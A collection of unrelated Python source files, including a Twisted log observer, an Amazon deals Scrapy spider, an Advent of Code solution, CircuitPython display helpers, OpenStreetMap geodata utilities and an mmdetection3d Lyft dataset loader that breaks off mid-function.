"DEBUG", # 3
"TRACE", # 4
)
_logger = None
class TotalLogFile(logfile.LogFile):
"""A log file that can optionally steal stdio"""
def __init__(self, name, directory, steal_stdio=False, **kwargs):
self._steal_stdio = steal_stdio
self._null_fd = os.open("/dev/null", os.O_RDWR)
logfile.LogFile.__init__(self, name, directory, **kwargs)
def _do_stdio(self):
file_fd = self._file.fileno()
os.dup2(self._null_fd, 0)
os.dup2(file_fd, 1)
os.dup2(file_fd, 2)
def _openFile(self):
logfile.LogFile._openFile(self)
if self._steal_stdio:
self._do_stdio()
def stdio(self):
self._steal_stdio = True
if not self.closed:
self._do_stdio()
def close(self):
os.dup2(self._null_fd, 1)
os.dup2(self._null_fd, 2)
logfile.LogFile.close(self)
class LogLevelObserver(object):
"""A file log observer with log levels and rotation"""
time_format = "%Y-%m-%dT%H:%M:%S %Z"
def __init__(self, log_name=None, log_level="INFO"):
assert log_level in LEVELS
self.log_level = list(LEVELS).index(log_level)
self.stdio_stolen = False
if log_name:
dirname, basename = os.path.split(os.path.abspath(log_name))
if not os.path.exists(dirname):
os.makedirs(dirname)
self.log_file = TotalLogFile(basename, dirname,
rotateLength=1024*1024*20, maxRotatedFiles=20)
self.log_stderr = sys.stderr
else:
self.log_file = sys.stdout
self.log_stderr = None
def start(self):
"""Setup logging using this observer"""
log.startLoggingWithObserver(self.emit, setStdout=0)
def stdio(self):
"""Steal stdout/err and log them"""
if isinstance(self.log_file, TotalLogFile):
self.stdio_stolen = True
self.log_file.stdio()
def emit(self, event):
"""Twisted log observer event handler"""
# All exceptions here will normally be lost. Attempt to log
# any problems to the original stderr in hopes that it is visible
try:
if event.get('isError', False):
level = 0 # ERROR
# HACK! tcp.Port and udp.Port like to announce themselves
# loudly but I don't want them to (well UDP at least). This
# seemed like an easier option than re-implementing things.
# Also catch all starting/stopping factory noise if it exists.
elif ('log_level' not in event and event.get('message', None) and
(event['message'][0].startswith(
'nagcat.plugins.query_ntp.NTPProtocol starting on') or
(event['message'][0].startswith('(Port ') and
event['message'][0].endswith(' Closed)'))) or
event['message'][0].startswith('Starting factory') or
event['message'][0].startswith('Stopping factory')):
level = 3 # DEBUG
else:
level = event.get('log_level', 2) # INFO
if self.log_level < level:
return
text = log.textFromEventDict(event)
text = text.replace("\n", "\n ")
date = time.strftime(self.time_format,
time.localtime(event.get('time', None)))
line = "%s [%s] %s\n" % (date, LEVELS[level], text)
util.untilConcludes(self.log_file.write, line)
util.untilConcludes(self.log_file.flush)
# During init stderr is used to provide loud errors to the
# console in addition to the log file to make things obvious.
if not self.stdio_stolen and level <= 1:
util.untilConcludes(self.log_stderr.write, line)
util.untilConcludes(self.log_stderr.flush)
except:
if not self.stdio_stolen:
self.log_stderr.write("%s" % failure.Failure())
def init(log_name, log_level):
"""Initialize the logger (in global scope)"""
global _logger
assert _logger is None
_logger = LogLevelObserver(log_name, log_level)
_logger.start()
def init_stdio():
"""Signal the logger to steal sys.stdout/err"""
_logger.stdio()
def _level_factory(index, name):
"""Setup the log level helper functions"""
def msg(text, *args):
if _logger and _logger.log_level < index:
return
text = str(text)
if args:
text = text % args
log.msg(text, log_level=index)
msg.__doc__ = "Log text at level %s" % name
msg.__name__ = name.lower()
globals()[msg.__name__] = msg
for index, name in enumerate(LEVELS):
_level_factory(index, name)
del index, name
|
import scrapy
from ..items import DealsItem
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
import time
class DealsSpider(scrapy.Spider):
name = 'deals'
allowed_domains = ['amazon.com', 'amazon.co.uk']
#To enable there to be a limit of how many pages to crawl we need to keep a count
count = 1
def __init__(self, q, dom=None, pages = None,dep=None):
self.q = q #Loading the multiprocessing list
self.pages = pages #Page crawl limit
self.dom=dom
self.dep = dep #dep should be the same as the text used for each category on the site
options = Options()
options.headless = True
self.driver = webdriver.Firefox(options=options)
#Deciding which function to use in start_requests() below.
#If a department was selected it will go to dep_parse(), otherwise it will go to parse().
if self.dep != None:
self.noDep = self.dep_parse
else:
self.noDep = self.parse
def start_requests(self):
if self.dom == "uk":
url = "https://www.amazon.co.uk/gp/goldbox/"
else:
#usa url will be the default
url = 'https://www.amazon.com/international-sales-offers/b/?ie=UTF8&node=15529609011'
self.driver.get(url)
yield scrapy.Request(url=url, callback=self.noDep)
def dep_parse(self,response):
time.sleep(3)
#Below we are loading the names of all the categories
if self.dom == "uk":
depts = self.driver.find_elements_by_css_selector("span.a-declarative [class='a-checkbox checkbox a-spacing-micro']")
else:#USA
#Need to expand list of all departments on US site
self.driver.find_element_by_css_selector("div.a-expander-inline-container span.a-expander-prompt").click()
time.sleep(1)
depts = self.driver.find_elements_by_css_selector("div.a-expander-inline-container span.a-declarative")
for dept in depts:
department = dept.find_element_by_css_selector("label span.a-checkbox-label").text
#Click the checkbox of the department specified by the user,
#then go to the parse function to scrape.
if self.dep == department:
dept.find_element_by_css_selector("label input").click()
link=self.driver.current_url
yield scrapy.Request(link, callback=self.parse, dont_filter=True)
break
def parse(self, response):
time.sleep(10) #Makes sure all the results will show
results = self.driver.find_elements_by_css_selector("div.a-row div.a-spacing-none.tallCellView")
#A list that contains all of the sections with a product
items = DealsItem()
for result in results:
try:
items["Product"] = result.find_element_by_css_selector("a.singleCellTitle span.a-declarative").text
except:
items["Product"] = "N/A"
try:
items["Price"] = result.find_element_by_css_selector("span.dealPriceText").text
except:
items["Price"] = "N/A"
try:
items["Pre_Price"] = result.find_element_by_css_selector("span.a-text-strike").text
except:
items["Pre_Price"] = "N/A"
try:
items["Rating"] = result.find_element_by_css_selector("div.reviewStars a.touchAnchor").get_attribute("aria-label").split(",")[0]
except:
items["Rating"] = "N/A"
try:
items["No_of_Ratings"] = int(result.find_element_by_css_selector("span.a-declarative span.a-size-small").text)
except:
items["No_of_Ratings"] = "N/A"
try:
items["Timer"] = result.find_element_by_css_selector("span[role='timer']").text
except:
items["Timer"] = "N/A"
try:
items["Claimed"] = result.find_element_by_css_selector("div.a-span5 span.a-size-mini").text
except:
items["Claimed"] = "N/A"
try:
items["URL"] = result.find_element_by_css_selector("a.a-link-normal[href]").get_attribute("href")
except:
items["URL"] = "N/A"
try:
items["IMG_URL"] = result.find_element_by_css_selector("img[src]").get_attribute("src")
except:
items["IMG_URL"] = "N/A"
yield items
try:#To go to the last page
NEXT_PAGE_SELECTOR = "[class='a-text-center'] ul.a-pagination li.a-last a[href]"
next_page = self.driver.find_element_by_css_selector(NEXT_PAGE_SELECTOR)
next_link = next_page.get_attribute("href")
next_page.click()
except:
next_page = None
#This will make sure to continue looping through all pages if a page limit is not set.
#If a limit is set, it makes sure to stay within the limit.
if next_page!=None and (self.pages==None or self.count<self.pages):
self.count+=1
yield scrapy.Request(response.urljoin(next_link), callback=self.parse, dont_filter=True)
else:
self.driver.quit()
|
"""
day 12
"""
import math
from part_1 import read_input, east, north, south, west, rotate, manhatten
def rotate(wayp_y, wayp_x, pos_y, pos_x, degrees):
delta_wayp_y = wayp_y - pos_y
delta_wayp_x = wayp_x - pos_x
if degrees == 90:
wayp_y = pos_y - delta_wayp_x
wayp_x = pos_x + delta_wayp_y
elif degrees == 180:
wayp_y = pos_y - delta_wayp_y
wayp_x = pos_x - delta_wayp_x
elif degrees == 270:
wayp_y = pos_y + delta_wayp_x
wayp_x = pos_x - delta_wayp_y
return wayp_y, wayp_x
def left_to_right(degrees):
return 360 - degrees
def solve(data):
start_y = 0
start_x = 0
wayp_y = 1
wayp_x = 10
pos_y = start_y
pos_x = start_x
for action, argumnet in data:
print(f"{action}{argumnet} p({pos_y}, {pos_x}) w({wayp_y}, {wayp_x})")
if action == 'N':
wayp_y += argumnet
elif action == "S":
wayp_y -= argumnet
elif action == "E":
wayp_x += argumnet
elif action == "W":
wayp_x -= argumnet
elif action == "L":
wayp_y, wayp_x = rotate(wayp_y, wayp_x, pos_y, pos_x,
left_to_right(argumnet))
elif action == "R":
wayp_y, wayp_x = rotate(wayp_y, wayp_x, pos_y, pos_x, argumnet)
elif action == "F":
delta_wayp_y = wayp_y - pos_y
delta_wayp_x = wayp_x - pos_x
pos_y += (wayp_y - pos_y) * argumnet
pos_x += (wayp_x - pos_x) * argumnet
wayp_y = pos_y + delta_wayp_y
wayp_x = pos_x + delta_wayp_x
print(f"res p({pos_y}, {pos_x}) w({wayp_y}, {wayp_x})")
# print(f"({pos_y}, {pos_x})")
return manhatten(pos_y, pos_x, start_y, start_x)
def main():
print(solve(read_input("sample.txt")))
print(solve(read_input("input.txt")))
if __name__ == "__main__":
main()
# 10 units east and 4 units north
# 4 units east and 10 units south
|
from django.apps import AppConfig
class ApiConfig(AppConfig):
name = 'API'
|
""" Test the Cookiecutter template.
A template project is created in a temporary directory, the project is built,
and its tests are run.
"""
from json import loads
from pathlib import Path
from shlex import split
from subprocess import check_call
from tempfile import TemporaryDirectory
from cookiecutter.main import cookiecutter
def main() -> int:
""" Execute the test.
"""
template = Path(__file__).resolve().parents[1]
defaults = loads(template.joinpath("cookiecutter.json").read_text())
with TemporaryDirectory() as tmpdir:
# TODO: Build and run tests.
cookiecutter(str(template), no_input=True, output_dir=tmpdir)
return 0
# Make the script executable.
if __name__ == "__main__":
raise SystemExit(main())
|
# The MIT License (MIT)
#
# Copyright (c) 2019 Jonah Yolles-Murphy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import displayio
from adafruit_display_text.text_area import TextArea
def color(r,g,b):
return (r<< 16) + (g<< 8) + (b)
red = color(255,0,0)
orange = color(2555,128,0)
yellow = color(255,255,0)
green = color(0,255,0)
blue = color(0,0,255)
purple = color(255,0,255)
white = color(255,255,255)
black = color(0,0,0)
clear = None
default_font = displayio.BuiltinFont
def rect(x, y, width, height, color):
global _bad_practice
plt = displayio.Palette(2)
plt.make_transparent(0)
plt[1] = color
return displayio.TileGrid(displayio.Shape(width, height), pixel_shader = plt, position = (x,y))
def roundrect(x, y, width, height, radius, color):
global _bad_practice
plt = displayio.Palette(2)
plt.make_transparent(0)
plt[1] = color
shp = displayio.Shape(width, height)
for y_pos in range(radius):
#not turned to int here due to rounding errors post subtractions below
clip_off = radius - ((radius**2)-(y_pos-radius)**2)**.5 #r-((r**2)-(y-r)**2)**.5 = x
shp.set_boundary(y_pos , int(clip_off), int(width- clip_off))
shp.set_boundary(height -1 -y_pos, int(clip_off) , int(width- clip_off))
return displayio.TileGrid(shp, pixel_shader = plt, position = (x,y))
def hline(x, y, length, thickness, color):
return rect(x, y, length, thickness, color)
def vline(x, y, length, thickness, color):
return rect(x, y, thickness, length, color)
def circle(x, y, radius, color):
return roundrect(x - radius, y - radius, radius*2, radius*2, radius, color)
"""
def text(x, y, width, height, color, text, font = None, background = clear):
if font == None:
font = default_font
"""
|
###############
# Repository: https://github.com/lgervasoni/urbansprawl
# MIT License
###############
import osmnx as ox
import pandas as pd
import geopandas as gpd
import numpy as np
from .tags import height_tags
from ..settings import storage_folder
# Format for load/save the geo-data ['geojson','shp']
geo_format = "geojson" # 'shp'
geo_driver = "GeoJSON" # 'ESRI Shapefile'
###################################################
# I/O utils
###################################################
def get_dataframes_filenames(city_ref_file):
"""
Get data frame file names for input city
Parameters
----------
city_ref_file : string
name of input city
Returns
----------
[ string, string, string ]
returns filenames for buildings, building parts, and points of
interest
"""
import os
if not (os.path.isdir(storage_folder)):
os.makedirs(storage_folder)
geo_poly_file = (
storage_folder + "/" + city_ref_file + "_buildings." + geo_format
)
geo_poly_parts_file = (
storage_folder + "/" + city_ref_file + "_building_parts." + geo_format
)
geo_point_file = (
storage_folder + "/" + city_ref_file + "_poi." + geo_format
)
return geo_poly_file, geo_poly_parts_file, geo_point_file
def load_geodataframe(geo_filename):
"""
Load input GeoDataFrame
Parameters
----------
geo_filename : string
input GeoDataFrame filename
Returns
----------
geopandas.GeoDataFrame
loaded data
"""
# Load using geopandas
df_osm_data = gpd.read_file(geo_filename)
# Set None as NaN
df_osm_data.fillna(value=np.nan, inplace=True)
# Replace empty string (Json NULL sometimes read as '') for NaN
df_osm_data.replace("", np.nan, inplace=True)
def list_int_from_string(
x
): # List of integers given input in string format
return [int(id_) for id_ in x.split(",")]
def list_str_from_string(
x
): # List of strings given input in string format
return x.split(",")
# Recover list
if "activity_category" in df_osm_data.columns:
df_osm_data["activity_category"] = df_osm_data.activity_category.apply(
lambda x: list_str_from_string(x) if pd.notnull(x) else np.nan
)
if "containing_parts" in df_osm_data.columns:
df_osm_data["containing_parts"] = df_osm_data.containing_parts.apply(
lambda x: list_int_from_string(x) if pd.notnull(x) else np.nan
)
if "containing_poi" in df_osm_data.columns:
df_osm_data["containing_poi"] = df_osm_data.containing_poi.apply(
lambda x: list_int_from_string(x) if pd.notnull(x) else np.nan
)
# To UTM coordinates
return ox.project_gdf(df_osm_data)
def store_geodataframe(df_osm_data, geo_filename):
"""
Store input GeoDataFrame
Parameters
----------
df_osm_data : geopandas.GeoDataFrame
input OSM data frame
geo_filename : string
filename for GeoDataFrame storage
Returns
----------
"""
# To EPSG 4326 (GeoJSON does not store projection information)
df_osm_data = ox.project_gdf(df_osm_data, to_latlong=True)
# Lists to string (needed to save GeoJSON files)
if "activity_category" in df_osm_data.columns:
df_osm_data.activity_category = df_osm_data.activity_category.apply(
lambda x: ",".join(str(e) for e in x)
if isinstance(x, list)
else np.nan
)
if "containing_parts" in df_osm_data.columns:
df_osm_data.containing_parts = df_osm_data.containing_parts.apply(
lambda x: ",".join(str(e) for e in x)
if isinstance(x, list)
else np.nan
)
if "containing_poi" in df_osm_data.columns:
df_osm_data.containing_poi = df_osm_data.containing_poi.apply(
lambda x: ",".join(str(e) for e in x)
if isinstance(x, list)
else np.nan
)
# Save to file
df_osm_data.to_file(geo_filename, driver=geo_driver)
###################################################
# GeoDataFrame processing utils
###################################################
def sanity_check_height_tags(df_osm):
"""
Compute a sanity check for all height tags
If incorrectly tagged, try to replace with the correct tag
Any meter or level related string are replaced, and heights using the
imperial units are converted to the metric system
Parameters
----------
df_osm : geopandas.GeoDataFrame
input OSM data frame
Returns
----------
"""
def sanity_check(value):
# Sanity check for height tags (sometimes wrongly-tagged)
if not ((value is np.nan) or (value is None) or (value == "")): # Non-null value
try: # Can be read as float?
return float(value)
except ValueError:
try: # Try removing incorrectly tagged information: meters/levels
return float(
value.replace("meters", "")
.replace("meter", "")
.replace("m", "")
.replace("levels", "")
.replace("level", "")
.replace("l", "")
)
except ValueError:
try: # Feet and inch values? e.g.: 4'7''
split_value = value.split("'")
feet, inches = split_value[0], split_value[1]
if inches is "": # Non existent inches
inches = "0"
tot_inches = float(feet) * 12 + float(inches)
# Return meters equivalent
return tot_inches * 0.0254
except TypeError: # None. Incorrect tag
return None
return value
# Available height tags
available_height_tags = [
col for col in height_tags if col in df_osm.columns
]
# Apply-map sanity check
df_osm[available_height_tags] = df_osm[available_height_tags].applymap(
sanity_check
)
def associate_structures(
df_osm_encompassing_structures,
df_osm_structures,
operation="contains",
column="containing_",
):
"""
Associate input structure geometries to its encompassing structures
Structures are associated using the operation 'contains' or 'intersects'
A new column in the encompassing data frame is added, incorporating the indices of the containing structures
Parameters
----------
df_osm_encompassing_structures : geopandas.GeoDataFrame
encompassing data frame
df_osm_structures : geopandas.GeoDataFrame
structures data frame
operation : string
spatial join operation to associate structures
column : string
name of the column to add in encompassing data frame
Returns
----------
"""
# Find, for each geometry, all containing structures
sjoin = gpd.sjoin(
df_osm_encompassing_structures[["geometry"]],
df_osm_structures[["geometry"]],
op=operation,
rsuffix="cont",
)
# Group by: polygon_index -> list of containing points indices
group_indices = sjoin.groupby(sjoin.index, as_index=True)[
"index_cont"
].apply(list)
# Create new column
df_osm_encompassing_structures.loc[
group_indices.index, column
] = group_indices.values
# Reset indices
df_osm_encompassing_structures.index.rename("", inplace=True)
df_osm_structures.index.rename("", inplace=True)
|
# Copyright (c) OpenMMLab. All rights reserved.
import os
import tempfile
from os import path as osp
import mmcv
import numpy as np
import pandas as pd
from lyft_dataset_sdk.lyftdataset import LyftDataset as Lyft
from lyft_dataset_sdk.utils.data_classes import Box as LyftBox
from pyquaternion import Quaternion
from mmdet3d.core.evaluation.lyft_eval import lyft_eval
from ..core import show_result
from ..core.bbox import Box3DMode, Coord3DMode, LiDARInstance3DBoxes
from .builder import DATASETS
from .custom_3d import Custom3DDataset
from .pipelines import Compose
@DATASETS.register_module()
class LyftDataset(Custom3DDataset):
r"""Lyft Dataset.
This class serves as the API for experiments on the Lyft Dataset.
Please refer to
`<https://www.kaggle.com/c/3d-object-detection-for-autonomous-vehicles/data>`_
for data downloading.
Args:
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
data_root (str): Path of dataset root.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
load_interval (int, optional): Interval of loading the dataset. It is
used to uniformly sample the dataset. Defaults to 1.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
box_type_3d (str, optional): Type of 3D box of this dataset.
Based on the `box_type_3d`, the dataset will encapsulate the box
to its original format then converted them to `box_type_3d`.
Defaults to 'LiDAR' in this dataset. Available options includes
- 'LiDAR': Box in LiDAR coordinates.
- 'Depth': Box in depth coordinates, usually for indoor dataset.
- 'Camera': Box in camera coordinates.
filter_empty_gt (bool, optional): Whether to filter empty GT.
Defaults to True.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
""" # noqa: E501
NameMapping = {
'bicycle': 'bicycle',
'bus': 'bus',
'car': 'car',
'emergency_vehicle': 'emergency_vehicle',
'motorcycle': 'motorcycle',
'other_vehicle': 'other_vehicle',
'pedestrian': 'pedestrian',
'truck': 'truck',
'animal': 'animal'
}
DefaultAttribute = {
'car': 'is_stationary',
'truck': 'is_stationary',
'bus': 'is_stationary',
'emergency_vehicle': 'is_stationary',
'other_vehicle': 'is_stationary',
'motorcycle': 'is_stationary',
'bicycle': 'is_stationary',
'pedestrian': 'is_stationary',
'animal': 'is_stationary'
}
CLASSES = ('car', 'truck', 'bus', 'emergency_vehicle', 'other_vehicle',
'motorcycle', 'bicycle', 'pedestrian', 'animal')
def __init__(self,
ann_file,
pipeline=None,
data_root=None,
classes=None,
load_interval=1,
modality=None,
box_type_3d='LiDAR',
filter_empty_gt=True,
test_mode=False,
**kwargs):
self.load_interval = load_interval
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
modality=modality,
box_type_3d=box_type_3d,
filter_empty_gt=filter_empty_gt,
test_mode=test_mode,
**kwargs)
if self.modality is None:
self.modality = dict(
use_camera=False,
use_lidar=True,
use_radar=False,
use_map=False,
use_external=False,
)
def load_annotations(self, ann_file):
"""Load annotations from ann_file.
Args:
ann_file (str): Path of the annotation file.
Returns:
list[dict]: List of annotations sorted by timestamps.
"""
# loading data from a file-like object needs file format
data = mmcv.load(ann_file, file_format='pkl')
data_infos = list(sorted(data['infos'], key=lambda e: e['timestamp']))
data_infos = data_infos[::self.load_interval]
self.metadata = data['metadata']
self.version = self.metadata['version']
return data_infos
def get_data_info(self, index):
"""Get data info according to the given index.
Args:
index (int): Index of the sample data to get.
Returns:
dict: Data information that will be passed to the data
preprocessing pipelines. It includes the following keys:
- sample_idx (str): sample index
- pts_filename (str): filename of point clouds
- sweeps (list[dict]): infos of sweeps
- timestamp (float): sample timestamp
- img_filename (str, optional): image filename
- lidar2img (list[np.ndarray], optional): transformations
from lidar to different cameras
- ann_info (dict): annotation info
"""
info = self.data_infos[index]
# standard protocol modified from SECOND.Pytorch
input_dict = dict(
sample_idx=info['token'],
pts_filename=info['lidar_path'],
sweeps=info['sweeps'],
timestamp=info['timestamp'] / 1e6,
)
if self.modality['use_camera']:
image_paths = []
lidar2img_rts = []
for cam_type, cam_info in info['cams'].items():
image_paths.append(cam_info['data_path'])
# obtain lidar to image transformation matrix
lidar2cam_r = np.linalg.inv(cam_info['sensor2lidar_rotation'])
lidar2cam_t = cam_info[
'sensor2lidar_translation'] @ lidar2cam_r.T
lidar2cam_rt = np.eye(4)
lidar2cam_rt[:3, :3] = lidar2cam_r.T
lidar2cam_rt[3, :3] = -lidar2cam_t
intrinsic = cam_info['cam_intrinsic']
viewpad = np.eye(4)
viewpad[:intrinsic.shape[0], :intrinsic.shape[1]] = intrinsic
lidar2img_rt = (viewpad @ lidar2cam_rt.T)
lidar2img_rts.append(lidar2img_rt)
input_dict.update(
dict(
img_filename=image_paths,
lidar2img=lidar2img_rts,
))
if not self.test_mode:
annos = self.get_ann_info(index)
input_dict['ann_info'] = annos
return input_dict
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: Annotation information consists of the following keys:
- gt_bboxes_3d (:obj:`LiDARInstance3DBoxes`):
3D ground truth bboxes.
- gt_labels_3d (np.ndarray): Labels of ground truths.
- gt_names (list[str]): Class names of ground truths.
"""
info = self.data_infos[index]
gt_bboxes_3d = info['gt_boxes']
gt_names_3d = info['gt_names']
gt_labels_3d = []
for cat in gt_names_3d:
if cat in self.CLASSES:
gt_labels_3d.append(self.CLASSES.index(cat))
else:
gt_labels_3d.append(-1)
gt_labels_3d = np.array(gt_labels_3d)
if 'gt_shape' in info:
gt_shape = info['gt_shape']
gt_bboxes_3d = np.concatenate([gt_bboxes_3d, gt_shape], axis=-1)
# the lyft box center is [0.5, 0.5, 0.5], we change it to be
# the same as KITTI (0.5, 0.5, 0)
gt_bboxes_3d = LiDARInstance3DBoxes(
gt_bboxes_3d,
box_dim=gt_bboxes_3d.shape[-1],
origin=(0.5, 0.5, 0.5)).convert_to(self.box_mode_3d)
anns_results = dict(
gt_bboxes_3d=gt_bboxes_3d,
gt_labels_3d=gt_labels_3d,
)
return anns_results
def _format_bbox(self, results, jsonfile_prefix=None):
"""Convert the results to the standard format.
Args:
results (list[dict]): Testing results of the dataset.
jsonfile_prefix (str): The prefix of the output jsonfile.
You can specify the output directory/filename by
modifying the jsonfile_prefix. Default: None.
Returns:
str: Path of the output json file.
"""
lyft_annos = {}
mapped_class_names = self.CLASSES
print('Start to convert detection format...')
for sample_id, det in enumerate(mmcv.track_iter_progress(results)):
annos = []
boxes = output_to_lyft_box(det)
sample_token = self.data_infos[sample_id]['token']
boxes = lidar_lyft_box_to_global(self.data_infos[sample_id], boxes)
for i, box in enumerate(boxes):
name = mapped_class_names[box.label]
lyft_anno = dict(
sample_token=sample_token,
translation=box.center.tolist(),
size=box.wlh.tolist(),
rotation=box.orientation.elements.tolist(),
name=name,
score=box.score)
annos.append(lyft_anno)
lyft_annos[sample_token] = annos
lyft_submissions = {
'meta': self.modality,
'results': lyft_annos,
}
mmcv.mkdir_or_exist(jsonfile_prefix)
res_path = osp.join(jsonfile_prefix, 'results_lyft.json')
print('Results writes to', res_path)
mmcv.dump(lyft_submissions, res_path)
return res_path
def _evaluate_single(self,
result_path,
logger=None,
metric='bbox',
result_name='pts_bbox'):
"""Evaluation for a single model in Lyft protocol.
Args:
result_path (str): Path of the result file.
logger (logging.Logger | str, optional): Logger used for printing
related information during evaluation. Default: None.
metric (str, optional): Metric name used for evaluation.
Default: 'bbox'.
result_name (str, optional): Result name in the metric prefix.
Default: 'pts_bbox'.
Returns:
dict: Dictionary of evaluation details.
"""
output_dir = osp.join(*osp.split(result_path)[:-1])
lyft = Lyft(
data_path=osp.join(self.data_root, self.version),
json_path=osp.join(self.data_root, self.version, self.version),
verbose=True)
eval_set_map = {
'v1.01-train': 'val',
}
metrics = lyft_eval(lyft, self.data_root, result_path,
eval_set_map[self.version], output_dir, logger)
# record metrics
detail = dict()
metric_prefix = f'{result_name}_Lyft'
for i, name in enumerate(metrics['class_names']):
AP = float(metrics['mAPs_cate'][i])
detail[f'{metric_prefix}/{name}_AP'] = AP
detail[f'{metric_prefix}/mAP'] = metrics['Final mAP']
return detail
def format_results(self, results, jsonfile_prefix=None, csv_savepath=None):
"""Format the results to json (standard format for COCO evaluation).
Args:
results (list[dict]): Testing results of the dataset.
jsonfile_prefix (str): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
csv_savepath (str): The path for saving csv files.
It includes the file path and the csv filename,
e.g., "a/b/filename.csv". If not specified,
the result will not be converted to csv file.
Returns:
tuple: Returns (result_files, tmp_dir), where `result_files` is a
dict containing the json filepaths, `tmp_dir` is the temporal
directory created for saving json files when
`jsonfile_prefix` is not specified.
"""
assert isinstance(results, list), 'results must be a list'
assert len(results) == len(self), (
'The length of results is not equal to the dataset len: {} != {}'.
format(len(results), len(self)))
if jsonfile_prefix is None:
tmp_dir = tempfile.TemporaryDirectory()
jsonfile_prefix = osp.join(tmp_dir.name, 'results')
else:
tmp_dir = None
# currently the output prediction results could be in two formats
# 1. list of dict('boxes_3d': ..., 'scores_3d': ..., 'labels_3d': ...)
# 2. list of dict('pts_bbox' or 'img_bbox':
# dict('boxes_3d': ..., 'scores_3d': ..., 'labels_3d': ...))
# this is a workaround to enable evaluation of both formats on Lyft
# refer to https://github.com/open-mmlab/mmdetection3d/issues/449
if not ('pts_bbox' in results[0] or 'img_bbox' in results[0]):
result_files = self._format_bbox(results, jsonfile_prefix)
else:
# should take the inner dict out of 'pts_bbox' or 'img_bbox' dict
result_files = dict()
for name in results[0]:
print(f'\nFormating bboxes of {name}')
results_ = [out[name] for out in results]
tmp_file_ = osp.join(jsonfile_prefix, name)
result_files.update(
{name: self._format_bbox(results_, tmp_file_)})
if csv_savepath is not None:
self.json2csv(result_files['pts_bbox'], csv_savepath)
return result_files, tmp_dir
def evaluate(self,
results,
metric='bbox',
logger=None,
jsonfile_prefix=None,
csv_savepath=None,
result_names=['pts_bbox'],
show=False,
out_dir=None,
pipeline=None):
"""Evaluation in Lyft protocol.
Args:
results (list[dict]): Testing results of the dataset.
metric (str | list[str], optional): Metrics to be evaluated.
Default: 'bbox'.
logger (logging.Logger | str, optional): Logger used for printing
related information during evaluation. Default: None.
jsonfile_prefix (str, optional): The prefix of json files including
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
csv_savepath (str, optional): The path for saving csv files.
It includes the file path and the csv filename,
e.g., "a/b/filename.csv". If not specified,
the result will not be converted to csv file.
result_names (list[str], optional): Result names in the
metric prefix. Default: ['pts_bbox'].
show (bool, optional): Whether to visualize.
Default: False.
out_dir (str, optional): Path to save the visualization results.
Default: None.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
Returns:
dict[str, float]: Evaluation results.
"""
result_files, tmp_dir = self.format_results(results, jsonfile_prefix,
csv_savepath)
if isinstance(result_files, dict):
results_dict = dict()
for name in result_names:
print(f'Evaluating bboxes of {name}')
ret_dict = self._evaluate_single(result_files[name])
results_dict.update(ret_dict)
elif isinstance(result_files, str):
results_dict = self._evaluate_single(result_files)
if tmp_dir is not None:
tmp_dir.cleanup()
if show or out_dir:
self.show(results, out_dir, show=show, pipeline=pipeline)
return results_dict
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='LIDAR',
load_dim=5,
use_dim=5,
file_client_args=dict(backend='disk')),
dict(
type='LoadPointsFromMultiSweeps',
sweeps_num=10,
file_client_args=dict(backend='disk')),
dict(
type='DefaultFormatBundle3D',
class_names=self.CLASSES,
with_label=False),
dict(type='Collect3D', keys=['points'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=False, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Whether to visualize the results online.
Default: False.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
if 'pts_bbox' in result.keys():
result = result['pts_bbox']
data_info = self.data_infos[i]
pts_path = data_info['lidar_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points = self._extract_data(i, pipeline, 'points').numpy()
points = Coord3DMode.convert_point(points, Coord3DMode.LIDAR,
Coord3DMode.DEPTH)
inds = result['scores_3d'] > 0.1
gt_bboxes = self.get_ann_info(i)['gt_bboxes_3d'].tensor.numpy()
show_gt_bboxes = Box3DMode.convert(gt_bboxes, Box3DMode.LIDAR,
Box3DMode.DEPTH)
pred_bboxes = result['boxes_3d'][inds].tensor.numpy()
show_pred_bboxes = Box3DMode.convert(pred_bboxes, Box3DMode.LIDAR,
Box3DMode.DEPTH)
show_result(points, show_gt_bboxes, show_pred_bboxes, out_dir,
file_name, show)
def json2csv(self, json_path, csv_savepath):
"""Convert the json file to csv format for submission.
Args:
json_path (str): Path of the result json file.
csv_savepath (str): Path to save the csv file.
"""
results = mmcv.load(json_path)['results']
sample_list_path = osp.join(self.data_root, 'sample_submission.csv')
data = pd.read_csv(sample_list_path)
Id_list = list(data['Id'])
pred_list = list(data['PredictionString'])
cnt = 0
